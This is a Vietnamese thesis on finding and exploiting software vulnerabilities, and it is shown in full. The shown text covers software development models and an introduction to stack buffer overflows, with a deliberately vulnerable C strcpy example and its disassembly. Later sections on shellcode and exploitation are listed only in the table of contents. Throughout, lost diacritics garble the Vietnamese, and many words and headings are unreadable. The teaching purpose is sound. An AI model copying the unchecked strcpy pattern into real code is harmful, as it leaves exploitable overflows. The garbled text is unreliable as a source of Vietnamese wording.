tràn bộ đệm
DESCRIPTION
tài liệu về tràn bộ đệmTRANSCRIPT
MC LCDANH MC CC T VIT TT.. 3DANH MC CC BNG.. 4DANH MC CC HNH V.. 5LI NI U.. 7CHNG I. TNG QUAN QUI TRNH PHT TRIN PHN MM 91.1. GII THIU CHUNG.. 91.1.1. Khi nim phn mm.. 91.1.2. Qui trnh pht trin phn mm.. 91.2. CC THNH PHN CA PHN MM 101.2.1. Cc ti liu ca qu trnh pht trin PM 101.2.2. Cc thnh phn to nn mt sn phm phn mm.. 101.3. M HNH PHT TRIN PHN MM 111.3.1. M hnh Waterfall 111.3.2. M hnh ch V.. 131.3.3. M hnh mu. 151.3.4. M hnh tin ha. 161.3.5. M hnh lp v tng dn. 171.3.6. M hnh pht trin nhanh. 191.3.7. M hnh xon. 20Kt lun chng I. 22CHNG II. LI BO MT PHN MM, MT S LI BO MT PHN MM PH BIN 232.1. GII THIU CHUNG.. 232.1.1. nh ngha li phn mm.. 232.1.2. nh ngha li bo mt phn mm.. 232.2. LI TRN B M TRN STACK.. 232.2.1. Tm hiu v Stack. 232.2.2. Li trn Stack (Stack Based BufferOverflow). 262.3. LI TRN B M TRN HEAP. 342.4. LI DOUBLE FREE.. 34Kt lun chng II. 36CHNG III. CC K THUT TM LI V CC BC KHAI THC LI BO MT PHN MM 373.1. TM V PHT HIN LI 373.1.1. Vai tr l lp trnh vin. 373.1.2. Vai tr l ngi kim th. 393.1.3. Vai tr l hacker. 403.2. CC BC KHAI THC LI 423.2.1. Mc chng trnh ti debugger. 423.2.2. xc nh chnh xc EIP trong b m.. 443.2.3. Tm khng gian b nh lu tr cc shellcode. 473.2.4. Nhy n shellcode mt cch tin cy. 523.2.5. Ly shellcode hon thin exploit 563.3. CC K THUT NHY TI SHELLCODE.. 573.3.1. jump (hoc call). 573.3.2. pop return. 593.3.3. Push return. 643.3.4. jmp [reg + offset]. 663.3.5. blind return. 673.3.6. Dealing with small buffers. 683.3.7. SEH (Structured Exception Handling). 743.3.8. Mt s k thut khc. 743.4. SHELLCODE BACKDOOR.. 78Kt lun chng III. 81 XUT QU TRNH PHT TRIN PHN MM AN TON.. 82KT LUN V NH HNG PHT TRIN.. 83TI LIU THAM KHO.. 84PH LC.. 851. PH LC 1: CHNG TRNH KHI NP TRONG B NH.. 852. PH LC 2: THE PROCESS MEMORY.. 863. PH LC 3. 894. PH LC 4: BNG OPCODE CA CC LNH NHY V C.. 905. PH LC 5 : CC BC THC HIN DEMO.. 92DANH MC CC T VIT TTK hiuThut ng ngha
SEPSoftware Development/Engineering ProcessQui trnh pht trin/xy dng phn mm
IDIdentifiernh danh
CSDLC s d liuC s d liu
SRSSoftware requirement specificationBn c t yu cu phn mm
GUIGraphical user interfaceGiao din ha ngi dng
RUPRational Unified ProcessQui trnh thng nht hp l
RADRapid Application DevelopmentM hnh pht trin nhanh
OSOperating systemH iu hnh
LIFOLast In First Outvo sau ra trc
ESPExtended Stack PointerCon tr stack m rng
EBPExtended Base PointerCon tr c s m rng
EIPExtended Instruction PointerCon tr lnh m rng
NOPNo Operation PerformedKhng thc hin hnh ng no
DLLDynamic Link LibraryTh vin lin kt ng
CPUCentral Processing UnitB x l trung tm
SEHStructured Exception HandlingX l cu trc ngoi l
DANH MC CC BNGBng 1.Bng lit k cc hm gy li
Bng 2.Bng cc cu trc gy li
Bng 3.Bng cc testcase
Bng 4.Bng opcode ca cc lnh nhy v c
DANH MC CC HNH VHnh 1.1M hnh Waterfall
Hnh 1.2M hnh ch V
Hnh 1.3M hnh Prototype
Hnh 1.4M hnh tin ha
Hnh 1.5M hnh lp v tng dn
Hnh 1.62 M hnh pht trin
Hnh 1.7M hnh xon
Hnh 2.1Stack
Hnh 2.2Push
Hnh 2.3Pop
Hnh 2.4Peek
Hnh 2.5Stack frame c to
Hnh 2.6Stack sau khi thc hin lnh MOV
Hnh 2.7Stack sau khi thc hin hm CALL
Hnh 2.8ESP s gim 4bytes
Hnh 2.9ESP tr n 0022FF5C
Hnh 2.10ESP li gim 4bytes ln na
Hnh 2.11ESP s gim mt s bytes c khng gian cho bin
Hnh 2.12Stack sau khi thc hin lnh MOV
Hnh 2.13ESP tr v u chui
Hnh 2.14Strcpy() s ghi EBP c lu v c EIP
Hnh 3.1strcpy, strncpy, v strlcpy
Hnh 3.2ng dng khng b crash
Hnh 3.3ng dng b crash
Hnh 3.4Giao din ca Windbg
Hnh 3.5Giao din ca Immunity
Hnh 3.6EIP cha 42424242 (BBBB)
Hnh 3.7Ni dung ca Buffer sau khi thc Easy RM to MP3 chy
Hnh 3.8ni dung ESP
Hnh 3.9Ni dung ca EIP sau khi ng dng sp
Hnh 3.10EIP mang gi tr BBBB
Hnh 3.11ESP lu a ch 000ff730
Hnh 3.12Ni dung ca Expliot buffer
Hnh 3.13ESP bt u t k t th 5
Hnh 3.14ESP tr vo k t u tin ca chui mu
Hnh 3.15eip cha ni dung l 000ff730
Hnh 3.16Mc windbg vi Easy RM to MP3
Hnh 3.17ffe4 l opcode ca jmp esp
Hnh 3.18Opcode ca jmp esp trong file dll
Hnh 3.19Kt qu thu c khi th nghim vi on NOP break
Hnh 3.20Khai thc thnh cng
Hnh 3.21Mt vi opcode
Hnh 3.22EIP b ghi a ch ti jmp esp
Hnh 3.23Opcode c trnh t 054,0xc3
Hnh 3.24phn b nh ln vi A
Hnh 3.25000ff849 l mt phn mu
Hnh 3.26shellcode di 344byte ng dng b crash
Hnh ph lcS b nh trong tin trnh ca Win32
LI NI UNgy nay, s pht trin ca cng ngh thng tin ngy cng chim mt v tr quan trng trong mi lnh vc ca cuc sng. S bng n ca khoa hc cng ngh ni chung v cng ngh thng tin ni ring em li rt nhiu li ch cho con ngi, rt ngn khong cch v a l, tng hiu sut, tit kim thi gian v chi ph cho cng vicKhi m cng ngh thng tin pht trin mnh m nh ngy nay, th my tnh l mt vt dng thit yu i vi mi ngi. T mi lnh vc trong cuc sng cho ti mi ngnh ngh u lin quan ti my tnh. Mi ngi lm vic vi my tnh chnh l lm vic vi phn mm. Phn mm tr thnh mt phn tt yu trong cng vic ca mi ngi khi lm vic vi my tnh. Vi s pht trin mnh m ca cng ngh phn mm to ra v vn cc sn phm, cng c phn mm phc v cho mi nhu cu ca con ngi. Phn mm em li nhng li ch v cng to ln cho con ngi, n gii quyt nhiu bi ton m trc kia con ngi khng th thc hin c. Song bn cnh nhng li ch to ln phn mm cng mang li khng t nhng nguy c ri ro. Cc ri ro ny ti t vic xut hin l hng bo mt trn nhng phn mm c s dng.Vy nhng l hng bo mt ny l g? Ti sao chng li xut hin? Cch th khai thc chng ra sao? y l nhng cu hi m nhiu ngi ang tm hiu. Vic tm hiu v l hng bo mt phn mm l mt vn v cng quan trng v chim khng t cng sc ca cc nh pht trin phn mm trn th gii. ti n tt nghip Nghin cu cc k thut tm v khai thc l hng bo mt phn mm c b cc gm 3 chng:Chng I. Tng quan qui trnh pht trin phn mm Nu l thuyt chung v phn mm Cc qui trnh pht trin phn mmChng II. Cc li bo mt phn mm ph bin Nu khi nim v li phn mm, li bo mt phn mm Tm hiu mt s li bo mt phn mm ph bin Phn tch li trn b m trn stackChng III. Cc k thut tm, pht hin v khai thc li bo mt phn mm Nu ra cc k thut tm li bo mt phn mm Nu ra cc k thut khai thc li bo mt phn mmDo ni dung bao gm nhiu kin thc mi, thi gian v kin thc cn hn ch, vic nghin cu ch yu da trn l thuyt nn chc chn ti khng trnh khi nhng thiu st. Em rt mong nhn c s ng gp kin ca thy c gio v bn b ti ca em ngy mt hon thin hn.Trong qu trnh thc hin ti, hon thin bi thc tp ny em xin chn thnh cm n Ban lnh o Hc Vin K Thut Mt M quan tm v to iu kin cho em c mi trng hc tp, rn luyn v nghin cu. Em xin chn thnh cm n cc Thy C gio trong khoa Cng Ngh Thng Tin, Khoa An Ton Thng Tin, Khoa C Bn, Khoa L Lun Chnh Tr cung cp cho em nhng kin thc ht sc qu bu trong Nm nm hc ti trng. c bit em xin c chn thnh cm n s nhit tnh gip ca thy L M T v thy V nh Thu nhit tnh hng dn gip em hon thnh ti ny.Em xin chn thnh cm n !CHNG I. TNG QUAN QUI TRNH PHT TRIN PHN MM1.1.GII THIU CHUNG1.1.1.Khi nim phn mmPhn mm l mt tp hp nhng cu lnh hoc ch th c vit bng ngn ng lp trnh theo mt trt t xc nh, v cc d liu hay ti liu lin quan nhm t ng thc hin mt s nhim v hay chc nng hoc gii quyt mt vn c th no .Phn mm thc hin cc chc nng ca n bng cch gi cc ch th trc tip n phn cng hoc bng cch cung cp d liu phc v cc chng trnh hay phn mm khc.Phn mm l mt khi nim tru tng, n khng th s hay ng vo, n cn c phn cng thc thi.1.1.2.Qui trnh pht trin phn mmQui trnh c th hiu l phng php thc hin hoc sn xut ra sn phm. Tng t nh vy, Qui trnh pht trin phn mm chnh l phng php pht trin hay sn xut ra sn phm phn mm.Thng thng mt qui trnh bao gm nhng yu t c bn sau: Th tc (Procedures) Hng dn cng vic (Activity Guidelines) Biu mu (Forms/templates) Danh sch kim nh (Checklists) Cng c h tr (Tools)Vi cc nhm cng vic chnh: c t yu cu (Requirements Specification): ch ra nhng i hi cho c cc yu cu chc nng v phi chc nng. Pht trin phn mm (Development): to ra phn mm tha mn cc yu cu c ch ra trong c t yu cu. Kim th phn mm (Validation/Testing): bo m phn mm sn xut ra p ng nhng i hi c ch ra trong c t yu cu. Thay i phn mm (Evolution): p ng nhu cu thay i ca khch hng.Ty theo m hnh pht trin phn mm, cc nhm cng vic c trin khai theo nhng cch khc nhau. sn xut cng mt sn phm phn mm ngi ta c th dng cc m hnh khc nhau. Tuy nhin khng phi tt c cc m hnh u thch hp cho mi ng dng.1.2.CC THNH PHN CA PHN MM1.2.1.Cc ti liu ca qu trnh pht trin PM Yu cu ca khch hng: Ti liu ny l kt qu ca qu trnh thu thp yu cu. Bao gm cc pht biu bng ngn ng t nhin (v cc s ). c t sn phm: Ti liu m t chi tit v phn mm, nhm phc v cho thit k phn mm. K hoch lm vic: Ti liu m t chi tit cc cng vic cn lm trong qu trnh pht trin phn mm Ti liu thit k phn mm: Bao gm cc ti liu v cu trc phn mm, Biu lung d liu, Biu trng thi qu trnh trao i, ch thch lnh. Ti liu kim th: Ti liu chi tit cho qu trnh kim th. Bao gm cc ti liu sau: K hoch kim th (Test plan) Dan sch cc trng hp kim th (Test case list) Bn bo co li pht hin (Bug report) Danh sch cc cng c cho vic kim th (Test tool)1.2.2.Cc thnh phn to nn mt sn phm phn mm Tp tr gip (Help files) Hng dn ngi dng (Users manual) Cc mu v v d (Samples and examples) Nhn v dn nhn (Labels and stickers) Thng tin h tr sn phm (Product support info) Biu tng v hnh ha (Icons and art) Thng bo li (Error messages) Qung co v ti liu tip th (Ads and marketing material) Thit lp v ci t (Setup and installation) Tp Readme[1](Readme file)1.3.M HNH PHT TRIN PHN MM1.3.1.M hnh WaterfallHnh 1.1: M hnh WaterfallM hnh ny bao gm cc giai on x l ni tip nhau nh c m t trong hnhPhn tch yu cu v ti liu c t (Requirements and Specifications): l giai on xc nh nhng i hi lin quan n chc nng v phi chc nng m h thng phn mm cn c. Giai on ny cn s tham gia tch cc ca khch hng v kt thc bng mt ti liu c gi l Bn c t yu cu phn mm hay SRS (software requirement specification), trong bao gm tp hp cc yu cu c duyt (reviewed) v nghim thu (approved) bi nhng ngi c trch nhim i vi d n (t pha khch hng). SRS chnh l nn tng cho cc hot ng tip theo cho n cui d n.Phn tch h thng v thit k (System Analysis and Design): l giai on nh ra lm th no (How) h thng phn mm p ng nhng i hi (What) m khch hng yu cu trong SRS. y l chnh l cu ni gia i hi (What) v m (Code) c hin thc p ng yu cu .Hin thc v kim th tng thnh phn (Coding and Unit Test): l giai on hin thc lm th no (How) c ch ra trong giai on Phn tch h thng v thit k.Kim th (Test): giai on ny s tin hnh kim th m (code) c hin thc, bao gm kim th tch hp cho nhm cc thnh phn v kim th ton h thng (system test). Mt khu kim th cui cng thng c thc hin l nghim thu (acceptance test), vi s tham gia ca khch hng trong vai tr chnh xc nh h thng phn mm c p ng yu cu ca h hay khng.Ci t v bo tr (Deployment and Maintenance): y l giai on ci t, cu hnh v hun luyn khch hng. Giai on ny sa cha nhng li ca phn mm (nu c) v pht trin nhng thay i mi c khch hng yu cu (nh sa i, thm hay bt chc nng/c im ca h thng).Thc t cho thy n nhng giai on sau mi c kh nng nhn ra sai st trong nhng giai on trc v phi quay li sa cha. y chnh l kiu waterfall dng lp (Iterative Waterfall)u im:Cc giai on c nh ngha, vi u vo v u ra r rng. M hnh ny c bn da trn ti liu nht l trong cc giai on u, u vo v u ra u l ti liu.Sn phm phn mm c hnh thnh thng qua chui cc hot ng xy dng phn mm theo trnh t r rng.Nhc im:i hi tt c yu cu phn mm phi c xc nh r rng ngay t u d n. Nhng a s d n thc t cho thy yu cu phn mm thng n cha khng nhiu th t nhng im khng chc chn.Mt thc t l cc d n him khi c thc hin y cc bc trong sut chu k d n. c bit l giai on kim th khi gn n ngy giao hng chng hn, nu c trc trc xy ra do yu cu phn mm khng r rng hay thit k c li, xu hng l m ngun c sa i trc tip m khng qua cc bc b sung theo ng m hnh, nn dn n bn c t phn mm cng nh mt s sn phm trung gian khc nh bn thit k, cho d c c cp nht sau ny cng c th khng phn nh y nhng g c sa i trong m ngun.Ngi s dng khng c c hi tham gia trong sut thi gian ca cc giai on trung gian t thit k cho n kim th. c bit vi nhng d n ln, ngi s dng ch c th nhn ra rng h thng phn mm khng ph hp cho nhu cu ca h vo thi im cui d n.Ni chung, m hnh ny thng n cha nhiu ri ro m ch c th pht hin giai on cui cng (c minh ha trong hnh) v chi ph sa cha c th rt cao.ng dng:Yu cu c nh ngha rt r rng, chi tit v hu nh khng thay i, thng xut pht t sn phm t mc n nh.Yu cu mi b sung (nu c) cng sm c xc nh r rng, y t u d n.i ng thc hin quen thuc v hiu r tt c yu cu ca d n, v c nhiu kinh nghim vi cc cng ngh c dng pht trin sn phm.D n c xc nh hu nh khng c ri ro.1.3.2.M hnh ch VTrong m hnh Waterfall, kim th c thc hin trong mt giai on ring bit. Cn vi m hnh ch V, ton b qui trnh c chia thnh hai nhm giai on tng ng nhau: pht trin v kim th. Mi giai on pht trin s kt hp vi mt giai on kim th tng ng nh c minh ha trong hnh.Hnh 1.2: M hnh ch VTinh thn ch o ca m hnh ch V l cc hot ng kim th phi c tin hnh song song (theo kh nng c th) ngay t u chu trnh cng vi cc hot ng pht trin. V d, cc hot ng cho vic lp k hoch kim th ton h thng c th c thc hin song song vi cc hot ng phn tch v thit k h thng.u im:Cc hot ng kim th c ch trng v thc hin song song vi cc hot ng lin quan n c t yu cu v thit k. Hay ni cch khc, m hnh ny khuyn khch cc hot ng lin quan n k hoch kim th c tin hnh sm trong chu k pht trin, khng phi i n lc kt thc giai on hin thc.Nhc im:Ging m hnh waterfallng dng:Tham kho m hnh waterfall.1.3.3.M hnh muHnh 1.3: M hnh PrototypeM hnh mu (prototype) c minh ho trong hnh. Trong , qui trnh c bt u bng vic thu thp yu cu vi s c mt ca i din ca c pha pht trin ln khch hng nhm nh ra mc tiu tng th ca h thng phn mm sau ny, ng thi ghi nhn tt c nhng yu cu c th bit c v s luc nhng nhm yu cu no cn phi c lm r.Sau , thc hin thit k nhanh tp trung chuyn ti nhng kha cnh thng qua prototype khch hng c th hnh dung, nh gi gip hon chnh yu cu cho ton h thng phn mm. Vic ny khng nhng gip tinh chnh yu cu, m ng thi gip cho i ng pht trin thng hiu hn nhng g cn c pht trin. Tip theo sau giai on lm prototype ny c th l mt chu trnh theo m hnh waterfall hay cng c th l m hnh khc.Ch , prototype thng c lm tht nhanh trong thi gian ngn nn khng c xy dng trn cng mi trng v cng c pht trin ca giai on xy dng phn mm thc s sau ny. Prototype khng t ra mc tiu ti s dng cho giai on pht trin thc s sau .u im:Ngi s dng sm hnh dung ra chc nng v c im ca h thng. Ci thin s lin lc gia nh pht trin v ngi s dng.Nhc im:Khi mu (prototype) khng chuyn ti ht cc chc nng, c im ca h thng phn mm th ngi s dng c th tht vng v mt i s quan tm n h thng s c pht trin. Prototype thng c lm nhanh, thm ch vi vng, theo kiu hin thc sa v c th thiu s phn tch nh gi mt cch cn thn tt c kha cnh lin quan n h thng cui cng. Ni chung m hnh ny vn cha th ci thin c vic loi tr khong cch gia yu cu v ng dng cui cng.ng dng:H thng ch yu da trn giao din ngi dng (GUI). Khch hng, nht l ngi s dng cui, khng th xc nh r rng yu cu.1.3.4.M hnh tin haHnh 1.4: M hnh tin haM hnh ny thc s cng l mt dng da trn m hnh mu, tuy nhin c s khc bit: M hnh tin ha xy dng nhiu phin bn prototype lin tip nhau. Nhng phin bn prototype trc s c xy dng vi mc tiu c th ti s dng trong nhng phin bn sau.Hnh trn minh ha m hnh tin ha, cho thy mt s phn ca h thng phn mm c th uc xy dng sm ngay t giai on thc hin phn tch yu cu v thit k.u im:Ch trng vic ti s dng mu. Mt phn ca h thng c th c pht trin ngay trong cc giai on phn tch pht trin yu cu v thit k.Cho php thay i yu cu v khuyn khch ngi s dng tham gia trong sut chu k ca d n.Nhc im:Lm chm qu trnh pht trin yu cu v c th nh hng s ch n cc cng vic trung gian nh kim tra m ngun, thc hin kim th cp thpD dn n kt cu ca h thng km.Thng th vi m hnh ny, tnh cht ch, minh bch ca qui trnh km.ng dng:H thng tng tc nh v va; phn GUI ca nhng h thng ln; nhng h thng cn chu k pht trin ngn.i ng pht trin khng quen thuc vi lnh vc ca d n.1.3.5.M hnh lp v tng dnHnh 1.5: M hnh lp v tng dnM hnh lp v tng dn c lc c hiu l mt. Tuy nhin, ta c th phn bit t nhiu s khc bit.Trc tin, hai m hnh ny u c im ging nhau l u da trn tinh thn ca m hnh tin ha, v c thm c im nhm n vic cung cp mt phn h thng khch hng c th a vo s dng trong mi trng hot ng sn xut thc s m khng cn ch cho n khi ton b h thng c hon thnh (trong m hnh mu hay tin ha, cc phin bn mu hay trung gian u khng nhm n a vo vn hnh thc s cho khch hng, tr phin bn cui cng). khch hng c th s dng, mi phin bn u phi c thc hin nh mt qui trnh y cc cng vic t phn tch yu cu vi kh nng b sung hay thay i, thit k, hin thc cho n kim nghim v c th xem nh mt qui trnh (chu trnh) con. Cc chu trnh con c th s dng cc m hnh khc nhau (thng thng l waterfall). Hnh trn minh ha hai m hnh ny, trong mi chu trnh con l mt waterfall nh.Mc tiu ca phin bn u tin l pht trin phn li v nhm cc chc nng quan trng. Sau mi phin bn c a vo s dng, cc kt qu nh gi s c phn hi v lp k hoch cho chu trnh con ca phin bn tip theo thc hin: Nhng thay i cho phin bn trc nhm p ng nhu cu khch hng tt hn C th thm nhng chc nng hoc c im b sung S khc nhau gia hai m hnh tng dn v lp c th c hiu n gin nh sau (so vi sn phm c hon thnh trong chu trnh con trc): M hnh tng dn (Incremental): thm chc nng vo sn phm (xem minh ho Hnh 6). M hnh lp (Iterative): thay i sn phm (xem minh ha Hnh 6) Mt SEP c th kt hp c hai m hnh lp ln tng dn, chng hn RUP (Rational Unified Process).Hnh 1.6: 2 M hnh pht trinu im:Gim ri ro sm trong chu k pht trin phn mm. Nhng yu cu quan trng thng c pht trin v chuyn n ngi s dng sm.Phn hi ca ngui s dng v nhng vn pht sinh trong phin bn trc c dng ci tin v ngn nga nhng vn tng t xy ra trong nhng phin bn tip theo.Nhc im:Tng chi ph lp k hoch pht trin cho ton h thng c th cao hn. Lu , y ch cp chi ph lp k hoch ban u, khng bao gm tt c chi ph pht sinh. Trong thc t, nu ng dng hp l, ton b chi ph v thi gian cho n khi sn phm c nghim thu c th thp hn so vi m hnh khc.Cc yu cu v k hoch v hot ng trong qui trnh c th s phc tp hn.ng dng:M hnh lp:i ng pht trin quen thuc vi lnh vc d n nhng khng c nhiu kinh nghim, nht l v cng ngh c dng pht trin d n.C nhiu ri ro v mt k thutM hnh tng dn:Ri ro c phn tch v xc nh ngay t u.Giao tip gia cc module cng c xc nh r rng t u.i ng pht trin quen thuc vi lnh vc ca d n v c nhiu kinh nghim.H thng ln c pht trin trong thi gian di, khch hng cn trin khai sm mt s phn ca h thng.1.3.6.M hnh pht trin nhanhM hnh pht trin nhanh (RAD Rapid Application Development) chnh l m hnh tng dn vi chu k pht trin cc ngn. t c mc tiu ny, RAD da trn phng php pht trin trn c s thnh phn ha h thng cng vi vic ti s dng cc thnh phn thch hp. RAD thch hp cho nhng h thng qun l thng tin.u im:Cho php gim thi gian pht trin cc ng dng CSDL v c nhiu giao din ngi dng hay tch hp cc thnh phn c sn. Ngi s dng s tham gia vo cc hot ng kim th.Nhc im:Kh c s nht qun gia nhng thnh phn c pht trin bi cc nhm khc nhau. Khng ph hp cho nhng ng dng i hi hiu sut v thng ph thuc vo s h tr ca mi trng pht trin v ngn ng cp cao.ng dng:H thng qun l thng tin kiu nhng ng dng da trn GUI v CSDL. C s h tr ca cng c hay s dng ngn ng cp cao. H thng khng yu cu kht khe v hiu sut.1.3.7.M hnh xonM hnh ny c xy dng bi Barry Boehm, t trng tm phn tch ri ro v xem xt k hoch gii quyt chng, thng qua nhiu chu k con ni tip c lp lin tip da trn bn cht ca m hnh lp.Trong m hnh ny, vic phn tch v gii quyt nhng vn c ri ro cao tp trung vo thit k tng kha cnh c th ch khng da vo vic x l cc vn mt cch chung chung.Hnh1.7: M hnh xonHnh 7 minh ha m hnh ny vi cc giai on lp theo chu k xoay vng, trong mi chu k bao gm 4 giai on con nh sau: Xc nh mc tiu cht lng cho sn phm c thc hin, ng thi xc nh s la chn mua, ti s dng hay t thit k v hin thc cc thnh phn ca h thng. Phn tch s la chn v cc ri ro c th xy ra. Vic ny c thc hin bi nhiu hot ng khc nhau thng qua lm mu hay m phng. Pht trin v kim nh sn phm mc tip theo da trn kt qu nh hng c ch ra trong giai on con s 2 (phn tch ri ro) Kim duyt tt c cc kt qu ca cc giai on con xy ra trc v lp k hoch cho chu k lp tip theo.u im:Phn tch nh gi ri ro c y ln nh mt phn thit yu trong mi ng xon c tng mc tin cy ca d n.Kt hp nhng tnh cht tt nht ca m hnh waterfall v tin ha.Cho php thay i ty theo iu kin thc t d n ti mi ng xon c.y chnh l m hnh tng qut nht, tt c cc m hnh khc u c th xem l mt hin thc ca m hnh tng qut ny, hay cng c th xem n l m hnh tng hp cc m hnh khc. c bit, n c ng dng khng ch trong pht trin phn mm m cn trong pht trin phn cng.Nhc im:Phc tp v khng ph hp cho d n nh vi t ri ro. Cn c k nng tt v phn tch ri ro.ng dng:D n ln c nhiu ri ro hay s thnh cng ca d n khng c c s m bo nht nh; nhng d n i hi nhiu tnh ton, x l nh h thng h tr quyt nh. i ng thc hin d n c kh nng phn tch ri ro.Kt lun chng I Chng I trnh khi nim phn mm, qui trnh pht trin phn mm; cc yu c bn ca mt qui trnh pht trin phn mm; cc ti liu ca qu trnh pht trin phn mm, cc thnh phn to nn mt sn phm phn mm; Tm hiu v cc m hnh pht trin phn mm cng nh u im, nhc im, v ng dng ca chng trong vic pht trin phn mm.Qua chng ny chng ta c ci nhn tng quan ban u v phn mm v vic pht trin mt sn phm phn mm. Sang chng tip theo chng ta s tm hiu v li bo mt phn mm v mt s li bo mt phn mm ph bin.CHNG II. LI BO MT PHN MM, MT S LI BO MT PHN MM PH BIN2.1.GII THIU CHUNG2.1.1.nh ngha li phn mmLi phn mm l mt khi nim dng ch li khi chy, l hng b khai thc, sai st trong kt qu, khng lm vic chnh xc ca phn mmHu ht cc li pht sinh t nhng sai lm hoc sai st ca lp trnh vin trong qu trnh vit m ngun hoc trong qu trnh thit k. Cn li l do trnh bin dch lm vic khng chnh xcCc li nghim trng c th dn ti vic chng trnh v sp hoc ng bng2.1.2.nh ngha li bo mt phn mmLi bo mt phn mm l li phn mm cho php k khai thc c th vt qua cc c ch bo mt ca h thng nh: vt qua c ch iu khin truy cp c c quyn tri php.Mt s tn cng da trn li phn mm ph bin hin nay m chng ta thng thy l: Truy cp tri php t xa, leo thang c quyn, t chi dch vMt s li bo mt phn mm ph bin l: Li trn b m trn stack, li trn b m trn heap, double free2.2.LI TRN B M TRN STACK2.2.1.Tm hiu v StackTrong khoa hc my tnh, mt ngn xp (cn gi l b xp chng, ting Anh: stack) l mt cu trc d liu tru tng hot ng theo nguyn l vo sau ra trc (Last In First Out LIFO. Phn t no c thm vo sau cng s l phn t c ly ra u tin.Stack l mt phn ca tin trnh b nh. Khi chng trnh c np vo b nh th phn on stack nm ngay sau phn on heap[2]. Stack c cp pht bi OS (H iu hnh) cho mi thread[3]khi thread c to. Khi thread kt thc, stack s c xa b. Kch thc ca stack c nh ngha khi c to v khng th thay i. Kt hp vi LIFO khng i hi c ch qun l phc tp nn stack kh nhanh. Tuy nhin, n b gii hn trong kch c.Mi phn t trong Stack phi cng kiu d liu v c th l bt k kiu d liu no. Mt Stack gm c phn y (bottom) v phn nh (top). Phn t nm nh Stack c gi l Top Item. Mi thao tc thm, xa phn t u din ra nh Stack.Hnh 2.1: StackStack n gin ch l mt danh sch. Do , n c hu ht cc thao tc nh trn danh sch nh thm, xa, tuy nhin cch ci t s khc i mt cht. Cc thao tc c bn nht ca Stack l:Push: chn mt phn t vo StackHnh 2.2: PushPop: ly mt phn t ra khi StackHnh 2.3: PopPeek: ly gi tr ca phn t nh StackHnh 2.4: PeekIsEmpty: kim tra Stack c rng hay khngClear: xa ht phn t trong StackKhi stack c to, con tr stack tr v nh ca stack ( bng a ch cao nht ca stack). Ngay khi d liu c push vo stack, con tr stack gim ( ti a ch thp hn). V vy, stack pht trin xung vng a ch thp hn.Stack lu bin cc b, li gi hm v nhng thng tin khc m khng cn lu tr trong thi gian ln. Mi ln gi hm, cc tham s ca hm c push vo stack, v cc gi tr c lu vo cc thanh ghi (EIP, EBP)[4]. Khi hm kt thc , gi tr lu ca EIP c ly ra t stack v t tr li EIP, t ng dng c th tr li bnh thng.2.2.2.Li trn Stack (Stack Based BufferOverflow)Li trn stack xut hin khi b m lu tr d liu trong b nh khng kim sot vic ghi gi tr trn n, dn n trn stack v vic trn stack ny dn n vic ghi a ch tr v ca hm. hiu r v trn stack nh th no. Cho mt v d sau c li trn stack (buffer overflow):#include void do_something(char *Buffer){char MyVar[128];strcpy(MyVar,Buffer);}int main (int argc, char **argv){do_something(argv[1]);}ng dng ly 1 agrument (tham s) ( argv[1] v truyn n vo hm do_something) Trong hm ny, agrument s c copy ti bin cc b c di ti a 128bytes. Vy nu agrument di hn 127bytes ( 1 Null byte ngt xu) b m c th b trn.Khi hm do_something() c gi t trong hm main(), c nhng iu sau xy ra:Mt stack frame c to ra, nh ca stack cha parent stack. Con tr stack stack pointer (ESP) tr vo a ch cao nht ca stack mi c to. y l nh ca stack.Hnh 2.5: Stack frame c toTrc khi do_something() c gi, con tr tr n agrument (i s) va c push (y) vo stack (ngn xp). Trong trng hp ny l tr ti argv[1]Stack sau khi thc hin lnh MOVHnh 2.6: Stacksau khi thc hin lnh MOVTip theo, hm do_something c gi. Hm CALL u tin t con tr lnh hin thi vo stack ( y c bit l ni m tr li khi hm ht thc) v nhy ti function code ( on code ca hm)Stack sau khi thc hin hm CALL:Hnh 2.7: Stack sau khi thc hin hm CALLSau khi push, ESP s gim 4bytes v tr v a ch thp hn:Hnh 2.8:ESP s gim 4bytesESP tr n 0022FF5C, a ch ny, chng ta thy a ch lu ca EIP (Return to) , tip theo l tr n tham s ( AAAA trong v d ny). Con tr c lu trn stack trc khi hm CALL c thc thi.Hnh 2.9: ESP tr n 0022FF5CTip theo, hm prolog thc thi. V c bn, thanh ghi c s frame pointer (EBP) c t vo stack. V vy n c th c phc hi khi hm tr v. Lnh lu frame pointer l push ebp . ESP li gim 4bytes ln na.Hnh 2.10: ESP li gim 4bytes ln naSau khi push ebp, con tr stack hin ti (ESP) t vo EBP. Ti im ny, c ESP v EBP u tr vo nh ca stack. T thi im , stack c tham chiu bi ESP ( lun nh ca stack by k lc no) v EBP, con tr c s ca stack hin ti. Bng cch ny, ng dng c th tham chiu n cc bin bng cc s dng offset vi EBP.Hu ht cc hm u bt u vi: PUSH EBP. Theo sau l: MOV EBP,ESPV vy, nu bn push 4bytes na vo stack. ESP s gim mt ln na cn EBP vn li . Bn c th tham chiu 4bytes ny bng cch s dng EBP 0x8.Tip theo, chng ta s xem lm th no stack phn b khong trng cho bin MyVar (128bytes). gi cc d liu, mt s khng gian trn stack c phn b lu gi bin, ESP s gim mt s bytes. Con s ny c th l hn 128bytes, ty thuc vo trnh bin dch. Trong trng hp ca Devcpp[5], s l 098 bytes, cho nn bn s nhn thy lnh SUB ESP,098. Bng cch , s c khng gian cho bin:Hnh 2.11: ESP s gim mt s bytes c khng gian cho binDisassembly[6]ca hm ging nh sau:00401290 /$ 55 PUSH EBP00401291 |. 89E5 MOV EBP,ESP00401293 |. 81EC 98000000 SUB ESP,9800401299 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |0040129C |. 894424 04 MOV DWORD PTR SS:[ESP+4],EAX ; |004012A0 |. 8D85 78FFFFFF LEA EAX,DWORD PTR SS:[EBP-88] ; |004012A6 |. 890424 MOV DWORD PTR SS:[ESP],EAX ; |004012A9 |. E8 72050000 CALL ; \strcpy004012AE |. C9 LEAVE004012AF \. C3 RETNC th thy r chc nng prolog: PUSH EBP v MOV EBP,ESP. Tip theo bn s thy cp pht khong trng cho bin Myvar: SUB ESP,98. V bn s thy mt s hm MOV v LEA ( c bn l thit lp cc tham s cho li gi hm strcpy). C th gii thch l: t con tr v argv[1] ( chnh l EBP+8 sao chp n vo EAX), sau sao chp EAX vo bin Myvar ( c v tr l ESP+4).C th nh sau:PUSH EBP: Tin hnh lu EBP ri MOV EBP,ESP: ESP v EBP cng tr ti nh stack, l EBP va c push vo.SUB ESP,98: Tin hnh cp pht mt khong nh l 152bytes ( 98 hexa to 